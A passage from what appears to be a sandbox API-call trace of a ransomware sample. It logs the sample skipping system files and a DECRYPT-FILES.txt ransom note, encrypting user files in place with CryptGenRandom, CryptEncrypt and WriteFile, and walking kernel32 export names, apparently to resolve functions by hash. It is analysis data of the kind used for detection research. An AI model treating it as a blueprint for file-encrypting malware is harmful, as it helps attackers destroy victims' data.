returned -1 [0080.374] lstrcmpiW (lpString1="Documents.mydocs", lpString2="bootsect.bak") returned 1 [0080.374] lstrcmpiW (lpString1="Documents.mydocs", lpString2="ntuser.dat.log") returned -1 [0080.374] lstrcmpiW (lpString1="Documents.mydocs", lpString2="thumbs.db") returned -1 [0080.374] lstrcmpiW (lpString1="Documents.mydocs", lpString2="Bootfont.bin") returned 1 [0080.374] lstrlenW (lpString="Documents.mydocs") returned 16 [0080.374] lstrcmpiW (lpString1="mydocs", lpString2="lnk") returned 1 [0080.374] lstrcmpiW (lpString1="mydocs", lpString2="exe") returned 1 [0080.374] lstrcmpiW (lpString1="mydocs", lpString2="sys") returned -1 [0080.374] lstrcmpiW (lpString1="mydocs", lpString2="dll") returned 1 [0080.375] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned 71 [0080.375] lstrlenW (lpString="Documents.mydocs") returned 16 [0080.375] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" [0080.375] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpString2="Documents.mydocs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Documents.mydocs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Documents.mydocs" [0080.375] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.375] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Documents.mydocs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\documents.mydocs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x458 [0080.375] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=0) returned 1 [0080.375] CreateFileMappingW (hFile=0x458, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 [0080.375] CloseHandle (hObject=0x0) returned 0 [0080.375] CloseHandle (hObject=0x458) returned 1 [0080.375] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.376] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d97bc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3d802e42, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fax Recipient.lnk", cAlternateFileName="FAXREC~1.LNK")) returned 1 [0080.376] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.376] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="autorun.inf") returned 1 [0080.376] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="boot.ini") returned 1 [0080.376] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="desktop.ini") returned 1 [0080.376] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="ntuser.dat") returned -1 [0080.376] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="iconcache.db") returned -1 [0080.376] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="bootsect.bak") returned 1 [0080.376] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="ntuser.dat.log") returned -1 [0080.376] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="thumbs.db") returned -1 [0080.376] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="Bootfont.bin") returned 1 [0080.376] lstrlenW (lpString="Fax Recipient.lnk") returned 17 [0080.376] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.376] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac135240, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac135240, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac135240, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0080.376] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0080.376] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0080.376] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0080.376] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0080.376] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0080.376] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0080.376] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0080.376] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0080.376] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0080.376] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0080.376] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.376] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0080.376] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0080.376] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0080.376] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0080.376] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned 71 [0080.376] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.376] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" [0080.376] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\jkbimi8.tmp" [0080.377] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.377] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0080.377] CloseHandle (hObject=0x0) returned 0 [0080.377] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.377] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d97bc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3bb9ed75, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mail Recipient.MAPIMail", cAlternateFileName="MAILRE~1.MAP")) returned 1 [0080.377] lstrcmpiW (lpString1="Mail Recipient.MAPIMail", lpString2="DECRYPT-FILES.txt") returned 1 [0080.377] lstrcmpiW (lpString1="Mail Recipient.MAPIMail", lpString2="autorun.inf") returned 1 [0080.377] lstrcmpiW (lpString1="Mail Recipient.MAPIMail", lpString2="boot.ini") returned 1 [0080.377] lstrcmpiW (lpString1="Mail Recipient.MAPIMail", lpString2="desktop.ini") returned 1 [0080.377] lstrcmpiW (lpString1="Mail Recipient.MAPIMail", lpString2="ntuser.dat") returned -1 [0080.377] lstrcmpiW (lpString1="Mail Recipient.MAPIMail", lpString2="iconcache.db") returned 1 [0080.377] lstrcmpiW (lpString1="Mail Recipient.MAPIMail", lpString2="bootsect.bak") returned 1 [0080.377] lstrcmpiW (lpString1="Mail Recipient.MAPIMail", lpString2="ntuser.dat.log") returned -1 [0080.377] lstrcmpiW (lpString1="Mail Recipient.MAPIMail", lpString2="thumbs.db") returned -1 [0080.377] lstrcmpiW (lpString1="Mail Recipient.MAPIMail", lpString2="Bootfont.bin") returned 1 [0080.377] lstrlenW (lpString="Mail Recipient.MAPIMail") returned 23 [0080.377] lstrcmpiW (lpString1="MAPIMail", lpString2="lnk") returned 1 [0080.377] lstrcmpiW (lpString1="MAPIMail", lpString2="exe") returned 1 [0080.378] lstrcmpiW (lpString1="MAPIMail", lpString2="sys") returned -1 [0080.378] lstrcmpiW (lpString1="MAPIMail", lpString2="dll") returned 1 [0080.378] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned 71 [0080.378] lstrlenW (lpString="Mail Recipient.MAPIMail") returned 23 [0080.378] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" [0080.378] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpString2="Mail Recipient.MAPIMail" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail" [0080.378] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.378] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\mail recipient.mapimail"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x458 [0080.378] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=4) returned 1 [0080.378] CreateFileMappingW (hFile=0x458, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x45c [0080.378] MapViewOfFile (hFileMappingObject=0x45c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0080.378] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0080.378] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0080.378] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.380] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0080.380] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0080.380] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.381] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0080.382] CloseHandle (hObject=0x45c) returned 1 [0080.382] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.382] WriteFile (in: hFile=0x458, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0080.383] CloseHandle (hObject=0x0) returned 0 [0080.383] CloseHandle (hObject=0x458) returned 1 [0080.384] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.384] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.384] GetTickCount () returned 0x114c958 [0080.385] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.385] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0080.385] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0080.385] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.385] lstrlenA (lpString="kernel32.dll") returned 12 [0080.385] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0080.385] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0080.386] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0080.386] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0080.386] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0080.386] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0080.386] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0080.386] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0080.386] lstrlenA (lpString="ADDATOMA") returned 8 [0080.386] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0080.386] lstrlenA (lpString="ADDATOMW") returned 8 [0080.386] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0080.386] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0080.386] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0080.386] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0080.386] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0080.386] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0080.386] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0080.386] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0080.386] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0080.386] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0080.386] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0080.386] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0080.386] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0080.386] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0080.386] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0080.386] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0080.386] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0080.386] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0080.386] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0080.386] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0080.386] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0080.386] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0080.386] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0080.386] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0080.386] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0080.386] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0080.386] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0080.387] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0080.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0080.387] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0080.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0080.387] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0080.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0080.387] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0080.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0080.387] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0080.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0080.387] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0080.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0080.387] lstrlenA (lpString="BACKUPREAD") returned 10 [0080.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0080.387] lstrlenA (lpString="BACKUPSEEK") returned 10 [0080.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0080.387] lstrlenA (lpString="BACKUPWRITE") returned 11 [0080.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0080.387] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0080.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0080.387] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0080.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0080.387] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0080.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0080.387] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0080.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0080.387] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0080.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0080.387] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0080.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0080.387] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0080.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0080.387] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0080.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0080.387] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0080.387] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0080.387] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0080.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0080.388] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0080.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0080.388] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0080.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0080.388] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0080.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0080.388] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0080.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0080.388] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0080.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0080.388] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0080.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0080.388] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0080.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0080.388] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0080.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0080.388] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0080.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0080.388] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0080.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0080.388] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0080.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0080.388] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0080.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0080.388] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0080.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0080.388] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0080.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0080.388] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0080.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0080.388] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0080.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0080.388] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0080.388] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0080.388] lstrlenA (lpString="BEEP") returned 4 [0080.389] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0080.389] lstrlenA 